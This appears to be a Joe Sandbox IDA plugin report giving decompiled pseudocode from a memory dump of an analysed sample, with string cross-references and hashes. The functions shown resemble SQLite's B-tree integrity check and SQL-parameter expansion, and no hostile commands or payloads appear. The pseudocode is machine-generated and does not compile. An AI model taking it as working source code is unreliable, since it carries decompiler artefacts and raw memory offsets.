															__eflags =  *((char*)(_t416 + 0x11));
															if( *((char*)(_t416 + 0x11)) != 0) {
																_t420 = E00DA7470( *_t452, _t581,  &_v141,  &_v72);
																_t593 = _t593 + 8;
																__eflags = _t420;
																if(_t420 == 0) {
																	_t517 = _v141;
																	_t421 = _v72;
																	__eflags = _t517 - 3;
																	if(_t517 != 3) {
																		L54:
																		_push(_t421);
																		_push(_t517 & 0x000000ff);
																		_push(_v140);
																		_push(3);
																		E00DB21F0(_t452, "Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)", _t581);
																		_t593 = _t593 + 0x1c;
																	} else {
																		__eflags = _t421 - _v140;
																		if(_t421 != _v140) {
																			goto L54;
																		}
																	}
																} else {
																	__eflags = _t420 - 7;
																	if(_t420 == 7) {
																		L50:
																		 *(_t452 + 0x18) = 1;
																	} else {
																		__eflags = _t420 - 0xc0a;
																		if(_t420 == 0xc0a) {
																			goto L50;
																		}
																	}
																	E00DB21F0(_t452, "Failed to read ptrmap key=%d", _t581);
																	_t593 = _t593 + 0xc;
																}
															}
															__eflags = 0;
															E00DB2280(_t452, 0, _t581, _v68);
															_t593 = _t593 + 8;
														}
														_t393 = _v136;
														__eflags =  *((char*)(_t393 + 8));
														if( *((char*)(_t393 + 8)) != 0) {
															 *_t585 =  *_t585 + 1;
															_t577 =  *_t585;
															_t585[_t577] = (_v18 & 0x0000ffff) - 0x00000001 + _v60 | _v60 << 0x00000010;
															_t399 = _t577 >> 1;
															__eflags = _t399;
															if(_t399 != 0) {
																while(1) {
																	_t509 = _t585[_t399];
																	_t549 = _t585[_t577];
																	__eflags = _t509 - _t549;
																	if(_t509 <= _t549) {
																		goto L74;
																	}
																	_t585[_t399] = _t549;
																	_t585[_t577] = _t509;
																	_t577 = _t399;
																	_t399 = _t399 >> 1;
																	__eflags = _t399;
																	if(_t399 != 0) {
																		continue;
																	} else {
																	}
																	goto L74;
																}
															}
														} else {
															_t578 =  *_v80;
															_t401 = _v112;
															asm("bswap edi");
															__eflags =  *((char*)(_t401 + 0x11));
															if( *((char*)(_t401 + 0x11)) != 0) {
																_t407 = E00DA7470( *_t452, _t578,  &_v126,  &_v64);
																_t593 = _t593 + 8;
																__eflags = _t407;
																if(_t407 == 0) {
																	_t512 = _v126;
																	_t408 = _v64;
																	__eflags = _t512 - 5;
																	if(_t512 != 5) {
																		L65:
																		_push(_t408);
																		_push(_t512 & 0x000000ff);
																		_push(_v140);
																		_push(5);
																		E00DB21F0(_t452, "Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)", _t578);
																		_t593 = _t593 + 0x1c;
																	} else {
																		__eflags = _t408 - _v140;
																		if(_t408 != _v140) {
																			goto L65;
																		}
																	}
																} else {
																	__eflags = _t407 - 7;
																	if(_t407 == 7) {
																		L61:
																		 *(_t452 + 0x18) = 1;
																	} else {
																		__eflags = _t407 - 0xc0a;
																		if(_t407 == 0xc0a) {
																			goto L61;
																		}
																	}
																	E00DB21F0(_t452, "Failed to read ptrmap key=%d", _t578);
																	_t593 = _t593 + 0xc;
																}
															}
															_t579 = E00DB2690(_t452, _t578,  &_a8, _a8, _a12);
															_v108 = 0;
															_t593 = _t593 + 0xc;
															__eflags = _t579 - _v96;
															if(_t579 != _v96) {
																_push("Child page depth differs");
																_push(_t452);
																E00DB21F0();
																_t593 = _t593 + 8;
																_v96 = _t579;
															}
														}
													} else {
														_push("Extends off end of page");
														_push(_t452);
														E00DB21F0();
														_t593 = _t593 + 8;
														L73:
														_v88 = 0;
													}
												}
											}
											L74:
											_t319 = _v92 - 1;
											__eflags = _t319;
											_v92 = _t319;
											if(_t319 >= 0) {
												continue;
											}
											break;
										}
										_t532 = _v132;
									}
									__eflags = _v88;
									_t565 = _v56;
									 *_t565 = _a8;
									 *((intOrPtr*)(_t565 + 4)) = _a12;
									 *(_t452 + 0x1c) = 0;
									if(_v88 == 0) {
										_t533 = _v136;
										 *_t533 = _v125;
										goto L13;
									} else {
										__eflags =  *(_t452 + 0x10);
										if( *(_t452 + 0x10) <= 0) {
											goto L12;
										} else {
											_t334 = _v136;
											__eflags =  *((char*)(_t334 + 8));
											if( *((char*)(_t334 + 8)) == 0) {
												_t585 =  *(_t452 + 0x40);
												 *_t585 = 0;
												__eflags = _t532;
												if(_t532 >= 0) {
													_t544 = _v124;
													_t457 = _v116 + _t532 * 2 + _t544;
													__eflags = _t457;
													do {
														_t572 =  *_t457 & 0x0000ffff;
														_t369 = _v136;
														_t371 =  *((intOrPtr*)( *((intOrPtr*)(_t369 + 0x4c))))(_t369, _t572 + _t544);
														 *_t585 =  *_t585 + 1;
														_t593 = _t593 + 8;
														_t574 =  *_t585;
														_t585[_t574] = (_t371 & 0x0000ffff) - 0x00000001 + _t572 | _t572 << 0x00000010;
														_t377 = _t574 >> 1;
														__eflags = _t377;
														if(_t377 != 0) {
															while(1) {
																_t500 = _t585[_t377];
																_t545 = _t585[_t574];
																__eflags = _t500 - _t545;
																if(_t500 <= _t545) {
																	goto L84;
																}
																_t585[_t377] = _t545;
																_t585[_t574] = _t500;
																_t574 = _t377;
																_t377 = _t377 >> 1;
																__eflags = _t377;
																if(_t377 != 0) {
																	continue;
																}
																goto L84;
															}
														}
														L84:
														_t457 = _t457 - 2;
														_t544 = _v124;
														_t379 = _v132 - 1;
														_v132 = _t379;
														__eflags = _t379;
													} while (_t379 >= 0);
													_t452 = _v76;
												}
											}
											_t536 = ( *(_v100 + 1) & 0x000000ff) << 0x00000008 |  *(_v100 + 2) & 0x000000ff;
											__eflags = _t536;
											if(_t536 > 0) {
												_t455 = _v124;
												do {
													_t356 = _t536 + _t455;
													_v116 = _t356;
													 *_t585 =  *_t585 + 1;
													_t571 =  *_t585;
													_t585[_t571] = _t536 - 0x00000001 + (( *(_t536 + _t455 + 2) & 0x000000ff) << 0x00000008 |  *(_t356 + 3) & 0x000000ff) | _t536 << 0x00000010;
													_t362 = _t571 >> 1;
													__eflags = _t362;
													if(_t362 != 0) {
														while(1) {
															_t497 = _t585[_t362];
															_t543 = _t585[_t571];
															__eflags = _t497 - _t543;
															if(_t497 <= _t543) {
																goto L92;
															}
															_t585[_t362] = _t543;
															_t585[_t571] = _t497;
															_t571 = _t362;
															_t362 = _t362 >> 1;
															__eflags = _t362;
															if(_t362 != 0) {
																continue;
															}
															goto L92;
														}
													}
													L92:
													_t536 =  *(_v116 + 1) & 0x000000ff | ( *_v116 & 0x000000ff) << 0x00000008;
													__eflags = _t536;
												} while (_t536 > 0);
												_t452 = _v76;
											}
											_t337 = _v120;
											_t537 = 0;
											__eflags = 0;
											while(1) {
												_t485 =  *_t585;
												_v132 = _t537;
												__eflags = _t485;
												if(_t485 == 0) {
													break;
												}
												_t569 = 1;
												_v116 = _t585[1];
												_t585[1] = _t585[_t485];
												_t585[_t485] = 0xffffffff;
												_t488 = 2;
												 *_t585 =  *_t585 - 1;
												__eflags =  *_t585 - 2;
												if( *_t585 >= 2) {
													while(1) {
														_t256 = _t488 + 1; // 0x3
														__eflags = _t585[_t488] -  *((intOrPtr*)(_t585 + 4 + _t488 * 4));
														_t355 = _t585[_t569];
														_t540 =  <=  ? _t488 : _t256;
														_t493 = _t585[_t540];
														__eflags = _t355 - _t493;
														if(_t355 < _t493) {
															break;
														}
														_t585[_t569] = _t493;
														_t569 = _t540;
														_t585[_t540] = _t355;
														_t488 = _t569 + _t569;
														__eflags = _t488 -  *_t585;
														if(_t488 <=  *_t585) {
															continue;
														}
														break;
													}
													_t537 = _v132;
												}
												_t570 = _v116;
												_t346 = _t570 >> 0x10;
												_t490 = _v120 & 0x0000ffff;
												__eflags = _t490 - _t346;
												if(_t490 >= _t346) {
													_t568 = _v140;
													_push(_t568);
													E00DB21F0(_t452, "Multiple uses for byte %u of page %d", _t346);
													_t593 = _t593 + 0x10;
													_t341 = _v132 - 1 + _v104 - (_v120 & 0x0000ffff);
													__eflags =  *_t585;
													if( *_t585 == 0) {
														L105:
														_t487 =  *(_v100 + 7) & 0x000000ff;
														__eflags = _t341 - _t487;
														if(_t341 != _t487) {
															_push(_t568);
															_push(_t487);
															E00DB21F0(_t452, "Fragmentation of %d bytes reported as %d on page %d", _t341);
															_t593 = _t593 + 0x14;
														}
													}
													goto L12;
												} else {
													_t537 = _t537 + _t346 - _t490 - 1;
													_t337 = _t570;
													_v120 = _t337;
													continue;
												}
												goto L109;
											}
											_t568 = _v140;
											_t341 = _v104 - 1 + _t537 - (_t337 & 0x0000ffff);
											__eflags = _t341;
											goto L105;
										}
										goto L109;
									}
									goto L110;
								} else {
									E00DB21F0(_t452, "btreeInitPage() returns error code %d", _t307);
									_t593 = _t593 + 0xc;
									L12:
									_t533 = _v136;
								}
								L13:
								_t527 =  *((intOrPtr*)(_t533 + 0x48));
								__eflags =  *(_t527 + 0x1c) & 0x00000020;
								if(( *(_t527 + 0x1c) & 0x00000020) == 0) {
									E00D9D580(_t527);
								} else {
									_t329 =  *((intOrPtr*)(_t527 + 0x14));
									 *((intOrPtr*)(_t329 + 0x78)) =  *((intOrPtr*)(_t329 + 0x78)) - 1;
									 *((intOrPtr*)(_t527 + 0x10)) =  *((intOrPtr*)(_t329 + 0x88));
									_t588 =  *((intOrPtr*)(_t329 + 0x3c));
									 *((intOrPtr*)(_t329 + 0x88)) = _t527;
									asm("cdq");
									_t331 = E00E766D0( *((intOrPtr*)(_t527 + 0x18)) - 1, 0,  *((intOrPtr*)(_t329 + 0x98)), _t527);
									 *((intOrPtr*)( *((intOrPtr*)( *_t588 + 0x48))))(_t588, _t331, _t527,  *((intOrPtr*)(_t527 + 4)));
									_t593 = _t593 + 0x10;
								}
							} else {
								E00DB21F0(__ecx, "unable to get the page. error code=%d", _t304);
								_t593 = _t593 + 0xc;
							}
							L109:
							 *(_t452 + 0x1c) = _v52;
							 *((intOrPtr*)(_t452 + 0x20)) = _v48;
							_pop(_t566);
							 *(_t452 + 0x24) = _v44;
							_pop(_t587);
							_pop(_t454);
							__eflags = _v96 + 1;
							return E00E76672(_v96 + 1, _t454, _v8 ^ _t593, _t527, _t566, _t587);
						} else {
							_t525 = _v140;
							E00DB21F0(__ecx, "2nd reference to page %d", _v140);
							_t592 = _t592 + 0xc;
							goto L5;
						}
					} else {
						E00DB21F0(__ecx, "invalid page number %d", __edx);
						_pop(_t583);
						_pop(_t589);
						_pop(_t458);
						return E00E76672(0, _t458, _v8 ^ _t592 + 0x0000000c, _t525, _t583, _t589);
					}
				}
				L110:
			}

0x00db2690
0x00db2696
0x00db269c
0x00db26a3
0x00db26ae
0x00db26b0
0x00db26b5
0x00db26b7
0x00db26bb
0x00db26c2
0x00db26c9
0x00db26d0
0x00db26d4
0x00db26d6
0x00db26da
0x00db26e2
0x00db26ed
0x00db26f5
0x00db26fc
0x00db275b
0x00db275d
0x00db275e
0x00db275f
0x00db2767
0x00db2771
0x00db26fe
0x00db2701
0x00db2736
0x00db273e
0x00db2740
0x00db2743
0x00db2745
0x00db2772
0x00db2775
0x00db2779
0x00db277b
0x00db277f
0x00db2785
0x00db278c
0x00db278f
0x00db279a
0x00db279c
0x00db279f
0x00db27a1
0x00db27b7
0x00db27bf
0x00db27c2
0x00db27c6
0x00db27c9
0x00db27ce
0x00db27d1
0x00db27d5
0x00db27d8
0x00db27de
0x00db27e3
0x00db27e6
0x00db27e6
0x00db27e8
0x00db27e8
0x00db27ef
0x00db27f3
0x00db27f6
0x00db27fb
0x00db27fd
0x00db2861
0x00db2865
0x00db2868
0x00db286c
0x00db2870
0x00db2872
0x00db2876
0x00db287d
0x00db2891
0x00db28a9
0x00db28be
0x00db28cb
0x00db28cf
0x00db28d1
0x00db297b
0x00db297e
0x00db28d7
0x00db28db
0x00db28df
0x00db28e2
0x00db28e4
0x00db28e7
0x00db28f4
0x00db28fe
0x00db2903
0x00db2906
0x00db2908
0x00db292e
0x00db2932
0x00db2936
0x00db2939
0x00db2941
0x00db2941
0x00db2945
0x00db2946
0x00db294a
0x00db2953
0x00db2958
0x00db293b
0x00db293b
0x00db293f
0x00000000
0x00000000
0x00db293f
0x00db290a
0x00db290a
0x00db290d
0x00db2916
0x00db2916
0x00db290f
0x00db290f
0x00db2914
0x00000000
0x00000000
0x00db2914
0x00db2924
0x00db2929
0x00db2929
0x00db2908
0x00db2969
0x00db296e
0x00db2971
0x00db2975
0x00db2975
0x00db2988
0x00db2988
0x00db298b
0x00db298f
0x00db2991
0x00db2995
0x00db29a0
0x00db29a0
0x00db29a4
0x00000000
0x00000000
0x00db29aa
0x00db29ae
0x00db29b9
0x00db29c3
0x00db29c6
0x00db29cd
0x00db29ce
0x00db29d2
0x00db29d4
0x00db2c3f
0x00db2c3f
0x00db2c40
0x00db2c48
0x00db2c4d
0x00000000
0x00db29da
0x00db29da
0x00db29dc
0x00000000
0x00db29e2
0x00db29ea
0x00db29ee
0x00db29f2
0x00db29fa
0x00db2a04
0x00db2a09
0x00db2a0d
0x00db2a0f
0x00db2a24
0x00db2a28
0x00db2a2c
0x00db2a2e
0x00db2a33
0x00db2a37
0x00db2a3b
0x00db2a4b
0x00db2a4e
0x00db2a50
0x00000000
0x00db2a52
0x00db2a52
0x00db2a55
0x00000000
0x00000000
0x00db2a55
0x00db2a50
0x00db2a3d
0x00db2a3d
0x00db2a40
0x00db2a42
0x00db2a57
0x00db2a57
0x00db2a5f
0x00db2a64
0x00db2a6b
0x00db2a6e
0x00db2a44
0x00db2a44
0x00db2a47
0x00000000
0x00db2a49
0x00db2a47
0x00db2a42
0x00db2a40
0x00db2a72
0x00db2a75
0x00db2a78
0x00db2a78
0x00db2a80
0x00db2a88
0x00db2a8f
0x00db2a91
0x00db2ab1
0x00db2ab5
0x00db2ab9
0x00db2abd
0x00db2abf
0x00db2ac3
0x00db2ad3
0x00db2ad8
0x00db2adb
0x00db2add
0x00db2b03
0x00db2b07
0x00db2b0b
0x00db2b0e
0x00db2b16
0x00db2b16
0x00db2b1a
0x00db2b1b
0x00db2b1f
0x00db2b28
0x00db2b2d
0x00db2b10
0x00db2b10
0x00db2b14
0x00000000
0x00000000
0x00db2b14
0x00db2adf
0x00db2adf
0x00db2ae2
0x00db2aeb
0x00db2aeb
0x00db2ae4
0x00db2ae4
0x00db2ae9
0x00000000
0x00000000
0x00db2ae9
0x00db2af9
0x00db2afe
0x00db2afe
0x00db2add
0x00db2b34
0x00db2b39
0x00db2b3e
0x00db2b3e
0x00db2b41
0x00db2b45
0x00db2b49
0x00db2c0e
0x00db2c17
0x00db2c1e
0x00db2c23
0x00db2c23
0x00db2c25
0x00db2c27
0x00db2c27
0x00db2c2a
0x00db2c2d
0x00db2c2f
0x00000000
0x00000000
0x00db2c31
0x00db2c34
0x00db2c37
0x00db2c39
0x00db2c39
0x00db2c3b
0x00000000
0x00000000
0x00db2c3d
0x00000000
0x00db2c3b
0x00db2c27
0x00db2b4f
0x00db2b53
0x00db2b55
0x00db2b59
0x00db2b5b
0x00db2b5f
0x00db2b6f
0x00db2b74
0x00db2b77
0x00db2b79
0x00db2b9f
0x00db2ba3
0x00db2ba7
0x00db2baa
0x00db2bb2
0x00db2bb2
0x00db2bb6
0x00db2bb7
0x00db2bbb
0x00db2bc4
0x00db2bc9
0x00db2bac
0x00db2bac
0x00db2bb0
0x00000000
0x00000000
0x00db2bb0
0x00db2b7b
0x00db2b7b
0x00db2b7e
0x00db2b87
0x00db2b87
0x00db2b80
0x00db2b80
0x00db2b85
0x00000000
0x00000000
0x00db2b85
0x00db2b95
0x00db2b9a
0x00db2b9a
0x00db2b79
0x00db2bdf
0x00db2be1
0x00db2be9
0x00db2bec
0x00db2bf0
0x00db2bf2
0x00db2bf7
0x00db2bf8
0x00db2bfd
0x00db2c00
0x00db2c00
0x00db2bf0
0x00db2a11
0x00db2a11
0x00db2a16
0x00db2a17
0x00db2a1c
0x00db2c50
0x00db2c50
0x00db2c50
0x00db2a0f
0x00db29dc
0x00db2c58
0x00db2c5c
0x00db2c5c
0x00db2c5f
0x00db2c63
0x00000000
0x00000000
0x00000000
0x00db2c63
0x00db2c69
0x00db2c69
0x00db2c6d
0x00db2c72
0x00db2c7c
0x00db2c7e
0x00db2c81
0x00db2c88
0x00db2e88
0x00db2e90
0x00000000
0x00db2c8e
0x00db2c8e
0x00db2c92
0x00000000
0x00db2c98
0x00db2c98
0x00db2c9c
0x00db2ca0
0x00db2ca6
0x00db2ca9
0x00db2caf
0x00db2cb1
0x00db2cba
0x00db2cbe
0x00db2cbe
0x00db2cc0
0x00db2cc7
0x00db2cce
0x00db2cd6
0x00db2cd8
0x00db2cda
0x00db2ce8
0x00db2cea
0x00db2cef
0x00db2cef
0x00db2cf1
0x00db2cf3
0x00db2cf3
0x00db2cf6
0x00db2cf9
0x00db2cfb
0x00000000
0x00000000
0x00db2cfd
0x00db2d00
0x00db2d03
0x00db2d05
0x00db2d05
0x00db2d07
0x00000000
0x00000000
0x00000000
0x00db2d07
0x00db2cf3
0x00db2d09
0x00db2d0d
0x00db2d10
0x00db2d14
0x00db2d15
0x00db2d19
0x00db2d19
0x00db2d1d
0x00db2d1d
0x00db2cb1
0x00db2d30
0x00db2d30
0x00db2d32
0x00db2d34
0x00db2d40
0x00db2d45
0x00db2d48
0x00db2d50
0x00db2d52
0x00db2d63
0x00db2d68
0x00db2d68
0x00db2d6a
0x00db2d70
0x00db2d70
0x00db2d73
0x00db2d76
0x00db2d78
0x00000000
0x00000000
0x00db2d7a
0x00db2d7d
0x00db2d80
0x00db2d82
0x00db2d82
0x00db2d84
0x00000000
0x00000000
0x00000000
0x00db2d84
0x00db2d70
0x00db2d86
0x00db2d94
0x00db2d94
0x00db2d94
0x00db2d98
0x00db2d98
0x00db2d9c
0x00db2da0
0x00db2da0
0x00db2da2
0x00db2da2
0x00db2da4
0x00db2da8
0x00db2daa
0x00000000
0x00000000
0x00db2db3
0x00db2db8
0x00db2dbf
0x00db2dc2
0x00db2dc9
0x00db2dce
0x00db2dd0
0x00db2dd2
0x00db2dd4
0x00db2dd8
0x00db2ddb
0x00db2dde
0x00db2de1
0x00db2de4
0x00db2de7
0x00db2de9
0x00000000
0x00000000
0x00db2deb
0x00db2dee
0x00db2df0
0x00db2df3
0x00db2df6
0x00db2df8
0x00000000
0x00000000
0x00000000
0x00db2df8
0x00db2dfa
0x00db2dfa
0x00db2dfe
0x00db2e08
0x00db2e0b
0x00db2e0e
0x00db2e10
0x00db2e1f
0x00db2e23
0x00db2e2b
0x00db2e34
0x00db2e45
0x00db2e47
0x00db2e4a
0x00db2e62
0x00db2e66
0x00db2e6a
0x00db2e6c
0x00db2e72
0x00db2e73
0x00db2e7b
0x00db2e80
0x00db2e80
0x00db2e6c
0x00000000
0x00db2e12
0x00db2e15
0x00db2e17
0x00db2e19
0x00000000
0x00db2e19
0x00000000
0x00db2e10
0x00db2e52
0x00db2e60
0x00db2e60
0x00000000
0x00db2e60
0x00000000
0x00db2c92
0x00000000
0x00db27ff
0x00db2806
0x00db280b
0x00db280e
0x00db280e
0x00db280e
0x00db2812
0x00db2812
0x00db2815
0x00db2819
0x00db2e99
0x00db281f
0x00db281f
0x00db2822
0x00db282b
0x00db282e
0x00db2831
0x00db2846
0x00db284c
0x00db2857
0x00db2859
0x00db2859
0x00db27a3
0x00db27aa
0x00db27af
0x00db27af
0x00db2e9e
0x00db2ea9
0x00db2eb0
0x00db2eb7
0x00db2eb8
0x00db2ebf
0x00db2ec0
0x00db2ec3
0x00db2ecc
0x00db2747
0x00db2747
0x00db2753
0x00db2758
0x00000000
0x00db2758
0x00db2703
0x00db270b
0x00db2715
0x00db2716
0x00db2717
0x00db2729
0x00db2729
0x00db2701
0x00000000

Strings

Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d), xrefs: 00DB294D, 00DB2B22, 00DB2BBE
Offset %d out of range %d..%d, xrefs: 00DB2C42
2nd reference to page %d, xrefs: 00DB274B, 00DB2751
unable to get the page. error code=%d, xrefs: 00DB27A4
Extends off end of page, xrefs: 00DB2A11
Fragmentation of %d bytes reported as %d on page %d, xrefs: 00DB2E75
Multiple uses for byte %u of page %d, xrefs: 00DB2E25
btreeInitPage() returns error code %d, xrefs: 00DB2800
Rowid %lld out of order, xrefs: 00DB2A59
invalid page number %d, xrefs: 00DB2704, 00DB2709
4n, xrefs: 00DB2785
Child page depth differs, xrefs: 00DB2BF2
Failed to read ptrmap key=%d, xrefs: 00DB291E, 00DB2AF3, 00DB2B8F

Memory Dump Source

Source File: 00000001.00000002.323573647.0000000000D91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000001.00000002.323569881.0000000000D90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323735047.0000000000EAB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323756852.0000000000ED8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323761910.0000000000EDD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.323766003.0000000000EE1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_d90000_8A3kk3sc5r.jbxd

Yara matches

Similarity

API ID:
String ID: 2nd reference to page %d$4n$Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)$Child page depth differs$Extends off end of page$Failed to read ptrmap key=%d$Fragmentation of %d bytes reported as %d on page %d$Multiple uses for byte %u of page %d$Offset %d out of range %d..%d$Rowid %lld out of order$btreeInitPage() returns error code %d$invalid page number %d$unable to get the page. error code=%d
API String ID: 0-3230429190
Opcode ID: f196f5c463f7d9f81fd48cb53d5cc9eab9719d6b338164541ce3eea377783be8
Instruction ID: 07621186c3fae66bbc2c2cf01332a6171f9a34e38471959b26d4851b8d2611ab
Opcode Fuzzy Hash: f196f5c463f7d9f81fd48cb53d5cc9eab9719d6b338164541ce3eea377783be8
Instruction Fuzzy Hash: 914249B2608341DFC714CF18C881ABBBBE5EB89304F18495DF89A87256D735E945CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00DBDCF0 Relevance: 15.4, Strings: 12, Instructions: 412
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E00DBDCF0(void* __ebx, char** __ecx, char* __edx) {
				signed int _v8;
				char _v116;
				signed int _v119;
				char _v120;
				signed int _v124;
				signed int _v128;
				char _v132;
				signed int _v136;
				char _v140;
				char* _v164;
				signed int _v172;
				char _v186;
				signed int _v188;
				char _v196;
				char* _v200;
				char _v204;
				char** _v208;
				signed int _v212;
				char* _v216;
				signed int _v220;
				char* _v224;
				signed int _v228;
				signed int _v232;
				void* __edi;
				void* __esi;
				signed int _t165;
				void* _t171;
				char* _t174;
				signed int _t176;
				signed int _t177;
				signed int _t187;
				void* _t190;
				intOrPtr* _t191;
				signed int _t193;
				signed int _t195;
				void* _t209;
				signed int _t215;
				signed int _t223;
				char _t227;
				short _t228;
				char _t229;
				signed int _t231;
				void* _t237;
				signed int _t245;
				intOrPtr _t248;
				signed int _t257;
				signed int _t260;
				char* _t263;
				intOrPtr* _t270;
				signed int _t272;
				signed int _t275;
				signed int _t277;
				signed int _t287;
				void* _t288;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t296;
				void* _t299;
				void* _t300;
				char* _t301;
				void* _t302;
				void* _t303;
				void* _t304;
				char* _t305;
				signed int _t306;
				signed int _t308;

				_t237 = __ebx;
				_t308 = (_t306 & 0xfffffff0) - 0xe8;
				_t165 =  *0xed8944; // 0xccebfc3b
				_v8 = _t165 ^ _t308;
				_t298 = __edx;
				_v208 = __ecx;
				_t281 =  *__ecx;
				_t287 =  &_v116;
				_v220 = 0;
				_v212 = 1;
				_v136 = _t287;
				_v140 = 0;
				_v132 = 0x64;
				_v128 = _t281[0x64];
				_v124 = 0;
				_v120 = 0;
				_v200 = _t281;
				if(_t281[0xac] <= 1) {
					__eflags = __ecx[4];
					if(__ecx[4] != 0) {
						__eflags =  *__edx;
						if( *__edx == 0) {
							goto L87;
						} else {
							asm("o16 nop [eax+eax]");
							while(1) {
								L31:
								_t173 = _t298;
								_v232 = 0;
								__eflags = 0;
								_v224 = _t298;
								_v228 = 0;
								while(1) {
									_t174 = E00E1DC00(_t173,  &_v204);
									__eflags = _v204 - 0x87;
									_t281 = _t174;
									_t245 = _v232;
									if(_v204 == 0x87) {
										break;
									}
									_t245 =  &(_t281[_t245]);
									_t173 =  &(_v224[_t281]);
									_v232 = _t245;
									_v224 = _t173;
									__eflags =  *_t173;
									if( *_t173 != 0) {
										continue;
									} else {
									}
									L36:
									_t176 = _v124 + _t245;
									__eflags = _t176 - _v132;
									if(__eflags < 0) {
										__eflags = _t245;
										if(_t245 != 0) {
											_v124 = _t176;
											__eflags = _t176 - _t245 + _t287;
											L00E79650(_t176 - _t245 + _t287, _t298, _t245);
											_t308 = _t308 + 0xc;
											goto L40;
										}
									} else {
										_t281 = _t298;
										E00D972A0( &_v140, _t298, __eflags, _t245);
										_t308 = _t308 + 4;
										L40:
										_t245 = _v232;
										_t287 = _v136;
									}
									_t177 = _v228;
									_t301 =  &(_t298[_t245]);
									__eflags = _t177;
									if(_t177 != 0) {
										__eflags =  *_t301 - 0x3f;
										if( *_t301 != 0x3f) {
											_t281 = _t301;
											_t187 = E00D99570( *((intOrPtr*)(_v208 + 0x78)), _t301, _t177);
											_t287 = _v136;
											_t308 = _t308 + 4;
											goto L47;
										} else {
											__eflags = _t177 - 1;
											if(_t177 <= 1) {
												_t187 = _v212;
												L47:
												_v220 = _t187;
											} else {
												_t281 =  &_v220;
												E00D98CB0( &(_t301[1]),  &_v220);
												_t187 = _v220;
											}
										}
										_t298 =  &(_t301[_v228]);
										_t70 = _t187 + 1; // 0x1
										_v212 = _t70;
										_v232 = _t298;
										_t190 =  *((intOrPtr*)(_v208 + 0x74)) + (_t187 + _t187 * 4) * 8;
										_t257 =  *(_t190 - 0x20) & 0x0000ffff;
										_t191 = _t190 + 0xffffffd8;
										_v224 = _t191;
										__eflags = _t257 & 0x00000001;
										if((_t257 & 0x00000001) == 0) {
											__eflags = _t257 & 0x00000004;
											if((_t257 & 0x00000004) == 0) {
												__eflags = _t257 & 0x00000008;
												if((_t257 & 0x00000008) == 0) {
													__eflags = _t257 & 0x00000002;
													if((_t257 & 0x00000002) == 0) {
														__eflags = _t257 & 0x00004000;
														if((_t257 & 0x00004000) == 0) {
															_t193 = _v124 + 2;
															__eflags = _t193 - _v132;
															if(__eflags < 0) {
																_v124 = _t193;
																 *((short*)(_t193 + _t287 - 2)) = 0x2778;
															} else {
																_t281 = "x\'";
																E00D972A0( &_v140, "x\'", __eflags, 2);
																_t308 = _t308 + 4;
															}
															_t296 = 0;
															_t195 = _v224[0xc];
															_v228 = _t195;
															__eflags = _t195;
															if(_t195 > 0) {
																_t305 = _v224;
																do {
																	L00D977E0( &_v140, "%02x",  *(_t296 + _t305[0x10]) & 0x000000ff);
																	_t296 = _t296 + 1;
																	_t308 = _t308 + 0xc;
																	__eflags = _t296 - _v228;
																} while (_t296 < _v228);
																_t298 = _v232;
															}
															_t260 = _v124 + 1;
															__eflags = _t260 - _v132;
															if(__eflags < 0) {
																_v124 = _t260;
																 *((char*)(_t260 + _v136 - 1)) = 0x27;
															} else {
																_t281 = "\'";
																E00D972A0( &_v140, "\'", __eflags, 1);
																_t308 = _t308 + 4;
															}
														} else {
															L00D977E0( &_v140, "zeroblob(%d)",  *_t191);
															_t308 = _t308 + 0xc;
														}
													} else {
														_t281 = _v200;
														_t263 = _t281[0x46];
														_v216 = _t263;
														__eflags = _t263 - 1;
														if(_t263 != 1) {
															asm("xorps xmm0, xmm0");
															asm("movq [esp+0x58], xmm0");
															asm("movaps [esp+0x38], xmm0");
															asm("movaps [esp+0x48], xmm0");
															_v164 = _t281;
															_t281 =  *(_t191 + 0x10);
															E00DB5560( &_v196,  *(_t191 + 0x10),  *((intOrPtr*)(_t191 + 0xc)), _v216, 0);
															_t308 = _t308 + 0xc;
															__eflags = _v188 & 0x00000002;
															if((_v188 & 0x00000002) != 0) {
																__eflags = _v186 - 1;
																if(_v186 != 1) {
																	_t281 = 1;
																	_t209 = E00D97A30( &_v196, 1);
																	__eflags = _t209 - 7;
																	if(_t209 == 7) {
																		_v120 = 1;
																		_v132 = 0;
																	}
																}
															}
															_t191 =  &_v196;
														}
														_push( *(_t191 + 0x10));
														L00D977E0( &_v140, "\'%.*q\'",  *((intOrPtr*)(_t191 + 0xc)));
														_t308 = _t308 + 0x10;
														__eflags = _v216 - 1;
														if(_v216 != 1) {
															__eflags = _v188 & 0x00002460;
															if((_v188 & 0x00002460) != 0) {
																L66:
																L00DB4E20(_t237,  &_v196, _t287);
															} else {
																__eflags = _v172;
																if(_v172 != 0) {
																	goto L66;
																}
															}
														}
													}
												} else {
													asm("movsd xmm0, [eax]");
													asm("movsd [esp], xmm0");
													_push("%!.15g");
													_push( &_v140);
													L00D977E0();
													_t308 = _t308 - 8 + 0x10;
												}
											} else {
												_push( *((intOrPtr*)(_t191 + 4)));
												L00D977E0( &_v140, "%lld",  *_t191);
												_t308 = _t308 + 0x10;
											}
										} else {
											_t215 = _v124 + 4;
											__eflags = _t215 - _v132;
											if(__eflags < 0) {
												_v124 = _t215;
												 *((intOrPtr*)(_t215 + _t287 - 4)) = 0x4c4c554e;
											} else {
												_t281 = "NULL";
												E00D972A0( &_v140, "NULL", __eflags, 4);
												_t308 = _t308 + 4;
											}
										}
										__eflags =  *_t298;
										if( *_t298 == 0) {
											goto L20;
										} else {
											_t287 = _v136;
											goto L31;
										}
									}
									goto L21;
								}
								_v228 = _t174;
								goto L36;
							}
						}
					} else {
						__eflags = __edx;
						if(__edx == 0) {
							goto L87;
						} else {
							_t270 = __edx;
